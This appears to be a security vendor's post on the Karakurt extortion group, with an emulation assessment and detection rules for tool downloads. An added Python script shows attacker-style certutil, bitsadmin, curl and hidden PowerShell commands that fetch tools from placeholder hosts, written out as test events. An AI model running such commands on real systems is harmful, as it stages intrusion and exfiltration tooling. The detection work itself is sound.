Response to US-CERT Alert AA22-152A – Karakurt Data Extortion Group 

AttackIQ has released a new scenario and assessment in response to US-CERT Alert AA22-152A, Karakurt Data Extortion Group.

On June 1, 2022, the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Department of the Treasury (Treasury), and the Financial Crimes Enforcement Network (FinCEN) released a joint Cybersecurity Advisory (CSA) providing information on the Karakurt data extortion group, also known as the Karakurt Team and Karakurt Lair.

The Karakurt threat actors do not perform traditional ransomware operations in which files are locked and encrypted. Instead, they focus on exfiltrating sensitive files and then threaten victims with data leaks or auctions unless a Bitcoin ransom is paid. Their access to victim organizations is typically bought from initial access broker groups, or obtained by purchasing stolen credential dumps that can be used to log in to the victim's legitimate network systems. The actors do not target specific sectors or victims but choose based on ease of access.

Once access to the victim's network has been established, the threat actor uses Cobalt Strike or living-off-the-land techniques to blend in with everyday activity. They commonly download legitimate tools such as FileZilla and Rclone to exfiltrate data to their cloud servers.

To assist customers in protecting their environments from these attacks, AttackIQ has released a new assessment that emulates the Ingress Tool Transfer (T1105) technique to download the actor's tools and malware. These scenarios test whether the network and endpoint controls in a customer's environment block known malicious files.

This assessment takes the following steps: 

  1. Download and Save Karakurt’s PDF Phishing Files: These PDFs are sent to potential victims asking them to download and open a malicious Microsoft Office document that leads to malware being installed.
  2. Download and Save Karakurt's Cobalt Strike Beacon malware: Like many threat actors, Karakurt relies on Cobalt Strike for post-compromise activities.
  3. Download and Save FileZilla: FileZilla is a legitimate open-source FTP and SFTP client that can be used via a graphical interface to upload and download files to remote servers. Karakurt uses this software to send the stolen files to their infrastructure.
  4. Download and Save Rclone: Rclone is a command-line tool that allows for synchronizing of files to remote cloud stores or remote file servers.
  5. Download and Save Microsoft Command Line XSL Transformation Tool: Msxsl.exe is a legitimate command-line tool from Microsoft that actors can abuse to bypass application whitelisting controls. The tool loads XML files that may contain embedded malicious scripts, which then execute inside the Msxsl process.

Detection Process
Once a malicious actor has compromised an endpoint, they may attempt to transfer additional tools or malware onto the device. Attackers commonly use built-in or widely available utilities such as PowerShell, Certutil, Bitsadmin, and Curl for this. The following pseudo-queries describe process creation events worth alerting on:

PowerShell Example:

Process Name == (cmd.exe OR powershell.exe)
Command Line CONTAINS (("IWR" OR "Invoke-WebRequest") AND "DownloadData" AND "Hidden")

Certutil Example:

Process Name == certutil.exe
Command Line CONTAINS ("-urlcache" AND "-f")

Bitsadmin Example:

Process Name == bitsadmin.exe
Command Line CONTAINS ("/transfer" AND "http")

Curl Example:

Process Name == curl.exe
Command Line CONTAINS ("http" AND "-o")

Additionally, downloads of file transfer utilities such as FileZilla and Rclone from their legitimate sites should be scrutinized to confirm that the requests were made by real users rather than by an intruder staging exfiltration tooling.
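The four detection rules above, expressed as matching logic and run over constructed process-creation events. This is an added example, not AttackIQ's code; the event layout, rule names and the example.invalid hosts are assumptions, and matching is case-insensitive on the image basename so a full System32 path and a bare process name are treated alike.

```python
"""The post's four T1105 download rules as matching logic over constructed Windows process events."""
from dataclasses import dataclass
import ntpath

@dataclass
class ProcessEvent:
    image: str         # path or bare name of the created process
    command_line: str

def _has_all(cmd: str, *terms: str) -> bool:
    return all(t.lower() in cmd for t in terms)

def _has_any(cmd: str, *terms: str) -> bool:
    return any(t.lower() in cmd for t in terms)

# rule name -> (process names that scope the rule, predicate over the lower-cased command line)
RULES = {
    "powershell_download": ({"cmd.exe", "powershell.exe"},
        lambda c: _has_any(c, "IWR", "Invoke-WebRequest") and _has_all(c, "DownloadData", "Hidden")),
    "certutil_urlcache": ({"certutil.exe"}, lambda c: _has_all(c, "-urlcache", "-f")),
    "bitsadmin_transfer": ({"bitsadmin.exe"}, lambda c: _has_all(c, "/transfer", "http")),
    "curl_download": ({"curl.exe"}, lambda c: _has_all(c, "http", "-o")),
}

def match_rules(event: ProcessEvent) -> list[str]:
    """Names of every rule that fires for one event. Matching is case-insensitive and keys
    on the image basename, so a full System32 path and a bare process name behave alike."""
    name = ntpath.basename(event.image).lower()
    cmd = event.command_line.lower()
    return [rule for rule, (procs, pred) in RULES.items() if name in procs and pred(cmd)]

# Constructed sample events (not real telemetry); example.invalid hosts and file names are placeholders.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\certutil.exe",
                 "certutil.exe -urlcache -f http://files.example.invalid/rclone.zip rclone.zip"),
    ProcessEvent(r"C:\Windows\System32\certutil.exe",
                 "certutil.exe -verify -urlfetch server.cer"),  # legitimate use, must not fire
    ProcessEvent(r"C:\Windows\System32\bitsadmin.exe",
                 "bitsadmin /transfer job http://files.example.invalid/fz.exe C:\\Users\\Public\\fz.exe"),
    ProcessEvent(r"C:\Windows\System32\curl.exe",
                 "curl.exe https://files.example.invalid/rclone.zip -o rclone.zip"),
    # The post's PowerShell rule needs IWR/Invoke-WebRequest AND DownloadData AND Hidden; -OutFile alone does not fire.
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell.exe -w Hidden -c "Invoke-WebRequest https://files.example.invalid/a.zip -OutFile a.zip"'),
]

def run_detection(events: list[ProcessEvent] = SAMPLE_EVENTS) -> list[list[str]]:
    """Rules fired per event, in input order."""
    return [match_rules(e) for e in events]
```

Note that the rules are substring matches as the post states them, so "-o" also matches "-output" and "http" also matches "https"; tune them against your own baseline before alerting.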

Mitigation Policies
It is advised that non-administrators be prevented from using tools such as powershell.exe, cmd.exe, and certutil.exe. This blocks malicious use of these tools under end-user accounts, which is where an intruder operating with purchased credentials would typically start.

The Adversary Research Team at AttackIQ is currently reviewing additional details about Karakurt compromises and will release, in the coming days, an advanced attack graph that emulates the actor's behaviors across a larger kill chain.

In summary, AttackIQ’s new assessment will help organizations test their network and endpoint anti-virus controls against known samples used in real attacks. With data generated from continuous testing and use of this assessment, you can focus your teams on achieving key security outcomes, adjusting your security controls, and working to elevate your total security program effectiveness against a known and dangerous threat. 

AttackIQ stands at the ready to help security teams implement this assessment and other aspects of the AttackIQ Security Optimization Platform, including through our co-managed security service, AttackIQ Vanguard.